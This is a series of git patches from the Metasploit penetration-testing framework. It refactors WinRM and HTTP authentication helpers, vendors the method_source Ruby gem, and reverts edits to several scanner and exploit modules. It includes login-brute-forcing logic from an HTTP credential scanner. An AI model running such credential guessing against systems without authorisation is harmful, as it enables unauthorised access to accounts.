Rex::Text::encode_base64(ntlm_message_3) - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'POST', - 'ctype' => ctype, - 'headers' => { 'Authorization' => "NEGOTIATE #{ntlm_message_3}"}, - 'data' => opts['data'] - })) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def accepts_ntlm_auth parse_auth_methods(winrm_poke).include? "Negotiate" end @@ -329,6 +241,17 @@ module Exploit::Remote::WinRM return "/root/cimv2/" end + def send_winrm_request(data, timeout=20) + opts = { + 'uri' => datastore['URI'], + 'method' => 'POST', + 'data' => data, + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'], + 'ctype' => "application/soap+xml;charset=UTF-8" + } + send_request_cgi(opts,timeout) + end private From 6abbbeb3ca154776089b45c23624890b298e69b6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 22:17:25 -0600 Subject: [PATCH 22/87] put gemcache for methodsource back --- .../1.9.1/gems/method_source-0.7.1/.gemtest | 0 .../gems/method_source-0.7.1/.travis.yml | 17 ++ .../1.9.1/gems/method_source-0.7.1/.yardopts | 1 + .../1.9.1/gems/method_source-0.7.1/Gemfile | 2 + .../1.9.1/gems/method_source-0.7.1/LICENSE | 25 +++ .../gems/method_source-0.7.1/README.markdown | 91 ++++++++++ .../1.9.1/gems/method_source-0.7.1/Rakefile | 76 ++++++++ .../method_source-0.7.1/lib/method_source.rb | 163 ++++++++++++++++++ .../lib/method_source/source_location.rb | 138 +++++++++++++++ .../lib/method_source/version.rb | 3 + .../method_source-0.7.1/method_source.gemspec | 33 ++++ .../gems/method_source-0.7.1/test/test.rb | 122 +++++++++++++ .../method_source-0.7.1/test/test_helper.rb | 50 ++++++ 13 files changed, 721 insertions(+) create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb create mode 100644 lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.gemtest new file mode 100644 index 0000000000..e69de29bb2 diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml new file mode 100644 index 0000000000..ba51bba6b2 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.travis.yml @@ -0,0 +1,17 @@ +rvm: + - 1.8.7 + - 1.9.2 + - 1.9.3 + - ree + - rbx-18mode + - rbx-19mode + - jruby + +notifications: + irc: "irc.freenode.org#pry" + recipients: + - jrmair@gmail.com + +branches: + only: + - master diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts new file mode 100644 index 0000000000..a4e7838016 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/.yardopts @@ -0,0 +1 @@ +-m markdown diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile new file mode 100644 index 0000000000..e45e65f871 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Gemfile @@ -0,0 +1,2 @@ +source :rubygems +gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE new file mode 100644 index 0000000000..d1a50d62d0 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/LICENSE @@ -0,0 +1,25 @@ +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown new file mode 100644 index 0000000000..d91b810a3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/README.markdown @@ -0,0 +1,91 @@ +method_source +============= + +(C) John Mair (banisterfiend) 2011 + +_retrieve the sourcecode for a method_ + +*NOTE:* This simply utilizes `Method#source_location`; it + does not access the live AST. + +`method_source` is a utility to return a method's sourcecode as a +Ruby string. Also returns `Proc` and `Lambda` sourcecode. + +Method comments can also be extracted using the `comment` method. + +It is written in pure Ruby (no C). + +* Some Ruby 1.8 support now available. +* Support for MRI, RBX, JRuby, REE + +`method_source` provides the `source` and `comment` methods to the `Method` and +`UnboundMethod` and `Proc` classes. + +* Install the [gem](https://rubygems.org/gems/method_source): `gem install method_source` +* Read the [documentation](http://rdoc.info/github/banister/method_source/master/file/README.markdown) +* See the [source code](http://github.com/banister/method_source) + +Example: display method source +------------------------------ + + Set.instance_method(:merge).source.display + # => + def merge(enum) + if enum.instance_of?(self.class) + @hash.update(enum.instance_variable_get(:@hash)) + else + do_with_enum(enum) { |o| add(o) } + end + + self + end + +Example: display method comments +-------------------------------- + + Set.instance_method(:merge).comment.display + # => + # Merges the elements of the given enumerable object to the set and + # returns self. + +Limitations: +------------ + +* Occasional strange behaviour in Ruby 1.8 +* Cannot return source for C methods. +* Cannot return source for dynamically defined methods. + +Special Thanks +-------------- + +[Adam Sanderson](https://github.com/adamsanderson) for `comment` functionality. + +[Dmitry Elastic](https://github.com/dmitryelastic) for the brilliant Ruby 1.8 `source_location` hack. + +[Samuel Kadolph](https://github.com/samuelkadolph) for the JRuby 1.8 `source_location`. + +License +------- + +(The MIT License) + +Copyright (c) 2011 John Mair (banisterfiend) + +Permission is hereby granted, free of charge, to any person obtaining +a copy of this software and associated documentation files (the +'Software'), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be +included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, +EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile new file mode 100644 index 0000000000..92c0234f3b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/Rakefile @@ -0,0 +1,76 @@ +dlext = Config::CONFIG['DLEXT'] +direc = File.dirname(__FILE__) + +require 'rake/clean' +require 'rake/gempackagetask' +require "#{direc}/lib/method_source/version" + +CLOBBER.include("**/*.#{dlext}", "**/*~", "**/*#*", "**/*.log", "**/*.o") +CLEAN.include("ext/**/*.#{dlext}", "ext/**/*.log", "ext/**/*.o", + "ext/**/*~", "ext/**/*#*", "ext/**/*.obj", "**/*.rbc", + "ext/**/*.def", "ext/**/*.pdb", "**/*_flymake*.*", "**/*_flymake") + +def apply_spec_defaults(s) + s.name = "method_source" + s.summary = "retrieve the sourcecode for a method" + s.version = MethodSource::VERSION + s.date = Time.now.strftime '%Y-%m-%d' + s.author = "John Mair (banisterfiend)" + s.email = 'jrmair@gmail.com' + s.description = s.summary + s.require_path = 'lib' + + s.add_development_dependency("bacon","~>1.1.0") + s.add_development_dependency("rake", "~>0.9") + s.homepage = "http://banisterfiend.wordpress.com" + s.has_rdoc = 'yard' + s.files = `git ls-files`.split("\n") + s.test_files = `git ls-files -- test/*`.split("\n") +end + +task :test do + sh "bacon -q #{direc}/test/test.rb" +end + +desc "reinstall gem" +task :reinstall => :gems do + sh "gem uninstall method_source" rescue nil + sh "gem install #{direc}/pkg/method_source-#{MethodSource::VERSION}.gem" +end + +desc "Set up and run tests" +task :default => [:test] + +namespace :ruby do + spec = Gem::Specification.new do |s| + apply_spec_defaults(s) + s.platform = Gem::Platform::RUBY + end + + Rake::GemPackageTask.new(spec) do |pkg| + pkg.need_zip = false + pkg.need_tar = false + end + + desc "Generate gemspec file" + task :gemspec do + File.open("#{spec.name}.gemspec", "w") do |f| + f << spec.to_ruby + end + end +end + +desc "build all platform gems at once" +task :gems => [:rmgems, "ruby:gem"] + +desc "remove all platform gems" +task :rmgems => ["ruby:clobber_package"] + +desc "build and push latest gems" +task :pushgems => :gems do + chdir("#{direc}/pkg") do + Dir["*.gem"].each do |gemfile| + sh "gem push #{gemfile}" + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb new file mode 100644 index 0000000000..9a3c325f75 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source.rb @@ -0,0 +1,163 @@ +# (C) John Mair (banisterfiend) 2011 +# MIT License + +direc = File.dirname(__FILE__) + +require "#{direc}/method_source/version" +require "#{direc}/method_source/source_location" + +module MethodSource + # Determine if a string of code is a valid Ruby expression. + # @param [String] code The code to validate. + # @return [Boolean] Whether or not the code is a valid Ruby expression. + # @example + # valid_expression?("class Hello") #=> false + # valid_expression?("class Hello; end") #=> true + def self.valid_expression?(str) + if defined?(Rubinius::Melbourne19) && RUBY_VERSION =~ /^1\.9/ + Rubinius::Melbourne19.parse_string(str) + elsif defined?(Rubinius::Melbourne) + Rubinius::Melbourne.parse_string(str) + else + catch(:valid) { + eval("BEGIN{throw :valid}\n#{str}") + } + end + true + rescue SyntaxError + false + end + + # Helper method responsible for extracting method body. + # Defined here to avoid polluting `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [File] The opened source file + def self.source_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + (line - 1).times { file.readline } + + code = "" + loop do + val = file.readline + code << val + + return code if valid_expression?(code) + end + end + end + + # Helper method responsible for opening source file and buffering up + # the comments for a specified method. Defined here to avoid polluting + # `Method` class. + # @param [Array] source_location The array returned by Method#source_location + # @return [String] The comments up to the point of the method. + def self.comment_helper(source_location) + return nil if !source_location.is_a?(Array) + + file_name, line = source_location + File.open(file_name) do |file| + buffer = "" + (line - 1).times do + line = file.readline + # Add any line that is a valid ruby comment, + # but clear as soon as we hit a non comment line. + if (line =~ /^\s*#/) || (line =~ /^\s*$/) + buffer << line.lstrip + else + buffer.replace("") + end + end + + buffer + end + end + + # This module is to be included by `Method` and `UnboundMethod` and + # provides the `#source` functionality + module MethodExtensions + + # We use the included hook to patch Method#source on rubinius. + # We need to use the included hook as Rubinius defines a `source` + # on Method so including a module will have no effect (as it's + # higher up the MRO). + # @param [Class] klass The class that includes the module. + def self.included(klass) + if klass.method_defined?(:source) && Object.const_defined?(:RUBY_ENGINE) && + RUBY_ENGINE =~ /rbx/ + + klass.class_eval do + orig_source = instance_method(:source) + + define_method(:source) do + begin + super + rescue + orig_source.bind(self).call + end + end + + end + end + end + + # Return the sourcecode for the method as a string + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method sourcecode as a string + # @example + # Set.instance_method(:clear).source.display + # => + # def clear + # @hash.clear + # self + # end + def source + if respond_to?(:source_location) + source = MethodSource.source_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !source + else + raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" + end + + source + end + + # Return the comments associated with the method as a string. + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method's comments as a string + # @example + # Set.instance_method(:clear).comment.display + # => + # # Removes all elements and returns self. + def comment + if respond_to?(:source_location) + comment = MethodSource.comment_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !comment + else + raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" + end + + comment + end + end +end + +class Method + include MethodSource::SourceLocation::MethodExtensions + include MethodSource::MethodExtensions +end + +class UnboundMethod + include MethodSource::SourceLocation::UnboundMethodExtensions + include MethodSource::MethodExtensions +end + +class Proc + include MethodSource::SourceLocation::ProcExtensions + include MethodSource::MethodExtensions +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb new file mode 100644 index 0000000000..9161854819 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb @@ -0,0 +1,138 @@ +module MethodSource + module ReeSourceLocation + # Ruby enterprise edition provides all the information that's + # needed, in a slightly different way. + def source_location + [__file__, __line__] rescue nil + end + end + + module SourceLocation + module MethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + else + + + def trace_func(event, file, line, id, binding, classname) + return unless event == 'call' + set_trace_func nil + + @file, @line = file, line + raise :found + end + + private :trace_func + + # Return the source location of a method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + if @file.nil? + args =[*(1..(arity<-1 ? -arity-1 : arity ))] + + set_trace_func method(:trace_func).to_proc + call(*args) rescue nil + set_trace_func nil + @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) + end + return [@file, @line] if File.exist?(@file.to_s) + end + end + end + + module ProcExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ + + # Return the source location for a Proc (Rubinius only) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + [block.file.to_s, block.line] + end + else + + # Return the source location for a Proc (in implementations + # without Proc#source_location) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + self.to_s =~ /@(.*):(\d+)/ + [$1, $2.to_i] + end + end + end + + module UnboundMethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + + else + + + # Return the source location of an instance method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + klass = case owner + when Class + owner + when Module + method_owner = owner + Class.new { include(method_owner) } + end + + # deal with immediate values + case + when klass == Symbol + return :a.method(name).source_location + when klass == Fixnum + return 0.method(name).source_location + when klass == TrueClass + return true.method(name).source_location + when klass == FalseClass + return false.method(name).source_location + when klass == NilClass + return nil.method(name).source_location + end + + begin + Object.instance_method(:method).bind(klass.allocate).call(name).source_location + rescue TypeError + + # Assume we are dealing with a Singleton Class: + # 1. Get the instance object + # 2. Forward the source_location lookup to the instance + instance ||= ObjectSpace.each_object(owner).first + Object.instance_method(:method).bind(instance).call(name).source_location + end + end + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb new file mode 100644 index 0000000000..b8142bfaef --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb @@ -0,0 +1,3 @@ +module MethodSource + VERSION = "0.7.1" +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec new file mode 100644 index 0000000000..83a727d6f6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec @@ -0,0 +1,33 @@ +# -*- encoding: utf-8 -*- + +Gem::Specification.new do |s| + s.name = "method_source" + s.version = "0.7.0" + + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= + s.authors = ["John Mair (banisterfiend)"] + s.date = "2012-01-01" + s.description = "retrieve the sourcecode for a method" + s.email = "jrmair@gmail.com" + s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] + s.homepage = "http://banisterfiend.wordpress.com" + s.require_paths = ["lib"] + s.rubygems_version = "1.8.10" + s.summary = "retrieve the sourcecode for a method" + s.test_files = ["test/test.rb", "test/test_helper.rb"] + + if s.respond_to? :specification_version then + s.specification_version = 3 + + if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then + s.add_development_dependency(%q, ["~> 1.1.0"]) + s.add_development_dependency(%q, ["~> 0.9"]) + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb new file mode 100644 index 0000000000..425e56acf9 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb @@ -0,0 +1,122 @@ +direc = File.dirname(__FILE__) + +require 'rubygems' +require 'bacon' +require "#{direc}/../lib/method_source" +require "#{direc}/test_helper" + +describe MethodSource do + + describe "source_location (testing 1.8 implementation)" do + it 'should return correct source_location for a method' do + method(:hello).source_location.first.should =~ /test_helper/ + end + + it 'should not raise for immediate instance methods' do + [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| + lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise + end + end + + it 'should not raise for immediate methods' do + [:a, 1, true, false, nil].each do |immediate| + lambda { immediate.method(:to_s).source_location }.should.not.raise + end + end + end + + before do + @hello_module_source = " def hello; :hello_module; end\n" + @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" + @hello_source = "def hello; :hello; end\n" + @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" + @lambda_comment = "# This is a comment for MyLambda\n" + @lambda_source = "MyLambda = lambda { :lambda }\n" + @proc_source = "MyProc = Proc.new { :proc }\n" + end + + it 'should define methods on Method and UnboundMethod and Proc' do + Method.method_defined?(:source).should == true + UnboundMethod.method_defined?(:source).should == true + Proc.method_defined?(:source).should == true + end + + describe "Methods" do + it 'should return source for method' do + method(:hello).source.should == @hello_source + end + + it 'should return source for a method defined in a module' do + M.instance_method(:hello).source.should == @hello_module_source + end + + it 'should return source for a singleton method as an instance method' do + class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source + end + + it 'should return source for a singleton method' do + $o.method(:hello).source.should == @hello_singleton_source + end + + + it 'should return a comment for method' do + method(:hello).comment.should == @hello_comment + end + + + if !is_rbx? + it 'should raise for C methods' do + lambda { method(:puts).source }.should.raise RuntimeError + end + end + end + + # if RUBY_VERSION =~ /1.9/ || is_rbx? + describe "Lambdas and Procs" do + it 'should return source for proc' do + MyProc.source.should == @proc_source + end + + it 'should return an empty string if there is no comment' do + MyProc.comment.should == '' + end + + it 'should return source for lambda' do + MyLambda.source.should == @lambda_source + end + + it 'should return comment for lambda' do + MyLambda.comment.should == @lambda_comment + end + end + # end + describe "Comment tests" do + before do + @comment1 = "# a\n# b\n" + @comment2 = "# a\n# b\n" + @comment3 = "# a\n#\n# b\n" + @comment4 = "# a\n# b\n" + @comment5 = "# a\n# b\n# c\n# d\n" + end + + it "should correctly extract multi-line comments" do + method(:comment_test1).comment.should == @comment1 + end + + it "should correctly strip leading whitespace before comments" do + method(:comment_test2).comment.should == @comment2 + end + + it "should keep empty comment lines" do + method(:comment_test3).comment.should == @comment3 + end + + it "should ignore blank lines between comments" do + method(:comment_test4).comment.should == @comment4 + end + + it "should align all comments to same indent level" do + method(:comment_test5).comment.should == @comment5 + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb new file mode 100644 index 0000000000..53da4e519c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb @@ -0,0 +1,50 @@ +def is_rbx? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ +end + +def jruby? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ +end + + +module M + def hello; :hello_module; end +end + +$o = Object.new +def $o.hello; :hello_singleton; end + +# A comment for hello + + # It spans two lines and is indented by 2 spaces +def hello; :hello; end + +# a +# b +def comment_test1; end + + # a + # b +def comment_test2; end + +# a +# +# b +def comment_test3; end + +# a + +# b +def comment_test4; end + + +# a + # b + # c +# d +def comment_test5; end + +# This is a comment for MyLambda +MyLambda = lambda { :lambda } +MyProc = Proc.new { :proc } + From 0ae489b37b34abe3f2fabeeb65deb83922d1c800 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:16:46 -0600 Subject: [PATCH 23/87] last of revert-merge snaffu --- modules/auxiliary/gather/shodan_search.rb | 4 +- .../scanner/http/cisco_device_manager.rb | 4 +- modules/auxiliary/scanner/http/http_login.rb | 186 +++--------------- .../scanner/http/tomcat_mgr_login.rb | 7 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 - .../auxiliary/scanner/winrm/winrm_login.rb | 6 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 7 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +- .../linux/http/piranha_passwd_exec.rb | 6 +- modules/exploits/multi/http/axis2_deployer.rb | 4 +- .../exploits/multi/http/jboss_bshdeployer.rb | 3 - .../exploits/multi/http/jboss_maindeployer.rb | 3 - .../exploits/multi/http/tomcat_mgr_deploy.rb | 14 +- .../unix/webapp/oracle_vm_agent_utl.rb | 3 - modules/exploits/windows/http/easyftp_list.rb | 4 +- .../windows/http/xampp_webdav_upload_php.rb | 10 +- .../windows/winrm/winrm_script_exec.rb | 23 +-- 17 files changed, 52 insertions(+), 239 deletions(-) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 8b114dbdd8..218427cc1f 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', + deregister_options('RPORT','RHOST', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') + 'NTLM::UseNTLMv2','SSL') register_options( [ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index fd57fda9bb..9486262be7 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify + web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['BasicAuthPass'].to_s.length == 0 + if datastore['PASSWORD'].to_s.length == 0 report_vuln( { diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 5a6b0ab9a6..4324e312f2 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri_and_scheme + def find_auth_uri - path_and_scheme = [] if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary next if not res end - next if not res.code == 401 - next if not res.headers['WWW-Authenticate'] - path_and_scheme << path - case res.headers['WWW-Authenticate'] - when /Basic/i - path_and_scheme << "Basic" - when /NTLM/i - path_and_scheme << "NTLM" - when /Digest/i - path_and_scheme << "Digest" - end - return path_and_scheme + return path end - return path_and_scheme + return path end def target_url @@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri, @scheme = find_auth_uri_and_scheme() + @uri = find_auth_uri if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary @uri = "/#{@uri}" if @uri[0,1] != "/" - if ! @scheme - print_error("#{target_url} Incompatible authentication scheme") - return - end - - print_status("Attempting to login to #{target_url} with #{@scheme} authentication") + print_status("Attempting to login to #{target_url}") each_user_pass { |user, pass| do_login(user, pass) @@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - success = false - proof = "" - - ret = do_http_login(user,pass,@scheme) - return :abort if ret == :abort - if ret == :success - proof = @proof.dup - success = true - end - - if success + + response = do_http_login(user,pass) + result = determine_result(response) + + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) + any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) + any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) if any_user == :success user = "anyuser" @@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", + :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", :source_type => "user_supplied", :active => true ) @@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_http_login(user,pass,scheme) - case scheme - when /NTLM/i - do_http_auth_ntlm(user,pass) - when /Digest/i - do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) - when /Basic/i - do_http_auth_basic(user,pass) - else - vprint_error("#{target_url}: Unknown authentication scheme") - return :abort - end - end - - def do_http_auth_ntlm(user,pass) + def do_http_login(user,pass) begin - resp,c 